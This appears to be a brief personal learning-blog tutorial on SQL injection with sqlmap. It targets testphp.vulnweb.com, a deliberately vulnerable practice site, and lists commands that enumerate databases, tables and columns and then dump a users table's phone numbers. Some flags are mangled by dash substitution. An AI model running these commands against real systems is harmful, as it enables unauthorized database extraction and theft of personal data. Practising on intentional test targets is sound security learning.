Persecure : my learning archive

SQL Injection Testing Using SQLMAP

Try out SQLMAP on this vulnerable website: testphp.vulnweb.com

Test out a simple SQL injection with ‘ at the end of the url.

Let’s try with SQLMAP

Finding databases 

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs

–dbs lists all the available databases.

2 databases available

Finding tables inside the database

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1  -D acuart — tables

Finding columns in the database

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1  -D acuart -T users –columns

Dump the data

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C phone --dump
Gets info on Phone numbers

Use the same command with the various columns to retrieve data.